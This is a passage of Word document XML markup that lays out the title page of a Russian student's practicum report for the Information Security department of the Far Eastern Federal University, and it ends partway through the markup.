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9EF30" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251653120" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="4F7E32A5" wp14:editId="3769B6AA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2930525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="428625" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="0"/>
            <wp:docPr id="18" name="image4.png" descr="logo"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png" descr="logo"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="428625" cy="571500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9857" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="249"/>
        <w:gridCol w:w="567"/>
        <w:gridCol w:w="284"/>
        <w:gridCol w:w="447"/>
        <w:gridCol w:w="236"/>
        <w:gridCol w:w="167"/>
        <w:gridCol w:w="284"/>
        <w:gridCol w:w="283"/>
        <w:gridCol w:w="1010"/>
        <w:gridCol w:w="883"/>
        <w:gridCol w:w="280"/>
        <w:gridCol w:w="279"/>
        <w:gridCol w:w="525"/>
        <w:gridCol w:w="283"/>
        <w:gridCol w:w="567"/>
        <w:gridCol w:w="284"/>
        <w:gridCol w:w="425"/>
        <w:gridCol w:w="284"/>
        <w:gridCol w:w="708"/>
        <w:gridCol w:w="709"/>
        <w:gridCol w:w="1103"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CB3331" w14:paraId="399EE9A3" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4809C387" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>МИНИСТЕРСТВО НАУКИ И ВЫСШЕГО ОБРАЗОВАНИЯ РОССИЙСКОЙ ФЕДЕРАЦИИ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="3EE500EE" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2075D2A8" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Федеральное государственное автономное образовательное </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="631F3299" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>учреждение высшего образования</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="2456760A" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72619322" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Дальневосточный федеральный университет</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="75EE0140" w14:textId="77777777" w:rsidTr="007860B2">
        <w:trPr>
          <w:trHeight w:val="170"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23FB2CAF" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="5739BBD7" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46B2DF9F" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="4BA9F363" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CE80238" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="3EF9A3C6" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51EAFD06" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>ШКОЛА ЕСТЕСТВЕННЫХ НАУК</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="261CFE75" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A0CBF8B" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="484D6AF3" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="415A8281" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="4F750EEC" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D0CCF2E" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Кафедра информационной безопасности</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="640072B8" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58CA4D33" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="62670675" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="003DEAD8" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="448879F3" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="256F93DE" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="2279F1DC" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42BB3200" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">О Т Ч Е Т </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="2ADD05ED" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B403FD1" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>о прохождении учебной практики (учебно-лабораторного практикума)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="351309AB" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C391622" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="1C1DD30C" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3666AD94" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="1AF8775E" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F362364" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="738C547F" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="490801ED" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="533EC474" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A036A70" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4888" w:type="dxa"/>
            <w:gridSpan w:val="9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60170B6D" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Выполнил студент </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F1E2C09" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>гр. С8117-10.05.01ммзи</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="25364C3D" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69927675" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32D75D1E" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B1C0FFC" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E9DDFFB" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19A68B2F" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Мельников </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>А.О.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="7245B949" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F17828C" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33F80C27" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DF6FF19" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17A52E23" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>(подпись)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36E7B634" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="393B627A" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77E221E6" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="392E964D" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="363DA7C8" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Отчет защищен с оценкой</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="765A65BD" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04FE0BCF" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3076" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2117B953" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Руководитель практики</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="262D76AD" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="61697DE7" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B48DE71" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
